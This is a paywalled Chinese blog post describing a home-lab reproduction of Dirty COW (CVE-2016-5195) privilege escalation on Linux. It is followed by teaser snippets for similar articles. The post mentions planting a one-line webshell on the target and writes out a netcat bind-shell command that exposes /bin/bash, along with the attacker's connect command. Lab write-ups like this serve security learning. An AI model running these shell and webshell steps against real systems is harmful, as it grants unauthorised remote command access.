linux利用脏牛提权

最新推荐文章于 2024-02-13 08:00:00 发布
最新推荐文章于 2024-02-13 08:00:00 发布
阅读量1.1k 收藏 8
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1262443306/article/details/115836631
版权

Linux利用脏牛漏洞提权:

  1. 提前准备:去github上面下载脏牛(https://github .com/FireFart/dirtycow)

​ 本主机:kali ip: 192.168.223.129

​ 目标机:ubuntu ip:192.168.223.128

​ 提前在目标机上面搭建环境,并开启web服务,上传一句话木马,然后用菜刀连接

打开虚拟终端:

在这里插入图片描述

2.利用nc实现正向shell反弹(nc下载指令: sudo apt-get install -y netcat-traditional)

在虚拟终端中输入:

nc -lvp 63777-e /bin/bash (如果出现nc: invalid option - 'e’这样的错误,请尝试sudo rm /etc/alternatives/nc && sudo ln -s /bin/nc.traditional /etc/alternatives/nc)

在kali上输入:

nc 192.168.223.128 63777

最低0.47元/天 解锁文章
fl4g
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
脏牛提权(靶机复现)
tubug的博客
03-26 1466
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
Linux利用脏牛漏洞提权
cxrpty的博客
03-10 5735
实验环境:Centos6.5、ssh、 实验步骤: 一、搭建实验环境 1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpphp 2.启动http,进入etc/init.d目录,输入:./httpd start 3.关掉selinux,输入:setenforce 0 4.在var/www/html目录下...
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
Linux提权扫描脚本
最新发布
04-28
Linux提权扫描脚本
dirtycow脏牛linux提权exp
03-25
dirtycow脏牛linux提权exp
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel < 5.16.11 / 5.15.25 / 5.10.102中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。   下面是具体的利用方法。   我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:   产生webshell   msfpayload windows/meterpret
Linux脏牛漏洞提权
weixin_46626159的博客
03-27 6345
Linux脏牛漏洞提权
Linux脏牛提权-->CVE-2016-5195
weixin_63124284的博客
12-15 391
linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。 并且在提权的时候,杀毒软件并不会检测到。
VulnHub--Lampiao-linux脏牛漏洞提权
记录笔记
07-06 1015
vulnhub-靶场--lampiao
权限提升-linux提权手法总结
01-14
权限提升-linux提权手法总结
xss、脏牛提权.zip
06-18
包含xss注入闯关小游戏和脏牛提权exp等干货
权限提升:利用Linux漏洞提权
qq_68163788的博客
02-13 1955
Linux漏洞提权是指利用Linux系统中存在的漏洞,通过特定的方法来获取更高的权限。这种方法通常被黑客用来获取系统管理员权限,从而可以对系统进行更深入的攻击和控制。 一种常见的Linux漏洞提权方法是利用内核漏洞。内核是操作系统的核心部分,负责管理系统的资源和提供各种功能。如果内核中存在漏洞,黑客可以利用这些漏洞来提升权限。例如,通过利用内核中的缓冲区溢出漏洞,黑客可以在系统中执行恶意代码,并获取更高的权限。
vulnhub--lampiao(脏牛提权
鲨鱼辣椒的博客
08-03 4438
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
Linux权限提升—内核、SUID、脏牛提权
剁椒鱼头没剁椒的博客
04-02 2905
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞。
Linux提权脏牛漏洞(CVE-2016-5195)复现
qq_40898302的博客
04-02 1482
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。【影响版本】:该漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权,受影响的镜像版本为:CentOS 5.x 32位/64位CentOS 6.x 32位/64位CentOS 7.x 32位/64位CoreOS 717.3.0 64位。
脏牛提权
weixin_30782293的博客
04-15 592
转载自:https://www.0dayhack.com/post-691.html EXP1:dirtycow (PS:lhq123321是密码,如果提权成功自动生成一个firefart的管理员权限账号) 转载于:https://www.cnblogs.com/zuoxiaolongzzz/p/8848062.html...
linux远程脏牛提权
06-11
"脏牛"漏洞是Linux内核中的一个本地提权漏洞,攻击者可以利用该漏洞在受害者系统上获得root权限。如果您想要远程利用该漏洞进行提权,需要首先在目标系统上获取访问权限。 一种方法是使用SSH连接到目标系统,然后执行利用脏牛漏洞的攻击代码。攻击代码可以是已经编写好的工具,也可以是自己编写的脚本。 请注意,利用脏牛漏洞进行攻击是非法的,可能会导致严重后果。建议您遵守法律法规并避免进行非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值